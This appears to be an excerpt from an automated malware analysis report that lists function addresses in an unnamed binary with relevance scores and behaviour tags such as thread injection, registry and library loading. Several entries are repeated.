synchronization

Function 001D2C05, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 6
windowregistrytime

Function 001D2997, Relevance: 9.1, APIs: 6, Instructions: 52 Total matches: 6
memorythreadinjection

Function 00403020, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50 Total matches: 3
threadinjection

Function 001D1E99, Relevance: 7.6, APIs: 5, Instructions: 63 Total matches: 6
thread

Function 001D1BAA, Relevance: 7.5, APIs: 5, Instructions: 36 Total matches: 6
threadsynchronizationinjection

Function 001D17D0, Relevance: 6.1, APIs: 4, Instructions: 138 Total matches: 6
synchronizationfile

Function 001D1466, Relevance: 6.1, APIs: 4, Instructions: 98 Total matches: 6
threadsynchronizationwindow

Function 001D1F4E, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 79 Total matches: 6
string

Function 001D3020, Relevance: 6.0, APIs: 4, Instructions: 50 Total matches: 3
threadinjection

Function 001D35DB, Relevance: 6.0, APIs: 4, Instructions: 45 Total matches: 6
registry

Function 001D1ABC, Relevance: 6.0, APIs: 4, Instructions: 28 Total matches: 6
synchronizationthread

Function 00402B08, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 88 Total matches: 6
stringfile

Function 00403358, Relevance: 18.1, APIs: 12, Instructions: 103 Total matches: 6
synchronizationthread

Function 001D2DE5, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 96 Total matches: 6
libraryloadermemory

Function 001D2CC7, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 112 Total matches: 5
libraryloader

Function 001D3094, Relevance: 18.2, APIs: 12, Instructions: 179 Total matches: 6
processthread

Function 00403683, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48 Total matches: 3
memorystringinjection

Function 001D3683, Relevance: 6.0, APIs: 4, Instructions: 48 Total matches: 3
memorystringinjection

Function 001D23B1, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94 Total matches: 6
timewindow

Function 001D34E1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80 Total matches: 6
synchronizationregistrythread

Function 001D2165, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90 Total matches: 6
thread

Function 001D3734, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 50 Total matches: 6
registrystring

Function 001D27E6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116 Total matches: 6
threadinjection

Function 001D2648, Relevance: 12.1, APIs: 8, Instructions: 110 Total matches: 5
threadwindownetwork

Function 001D19F3, Relevance: 12.1, APIs: 8, Instructions: 53 Total matches: 6
synchronization

Function 001D2C05, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 6
windowregistrytime

Function 001D2997, Relevance: 9.1, APIs: 6, Instructions: 52 Total matches: 6
memorythreadinjection

Function 00403020, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50 Total matches: 3
threadinjection

Function 001D1E99, Relevance: 7.6, APIs: 5, Instructions: 63 Total matches: 6
thread

Function 001D1BAA, Relevance: 7.5, APIs: 5, Instructions: 36 Total matches: 6
threadsynchronizationinjection

Function 001D17D0, Relevance: 6.1, APIs: 4, Instructions: 138 Total matches: 6
synchronizationfile

Function 001D1466, Relevance: 6.1, APIs: 4, Instructions: 98 Total matches: 6
threadsynchronizationwindow

Function 001D1F4E, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 79 Total matches: 6
string

Function 001D3020, Relevance: 6.0, APIs: 4, Instructions: 50 Total matches: 3
threadinjection

Function 001D35DB, Relevance: 6.0, APIs: 4, Instructions: 45 Total matches: 6
registry

Function 001D1ABC, Relevance: 6.0, APIs: 4, Instructions: 28 Total matches: 6
synchronizationthread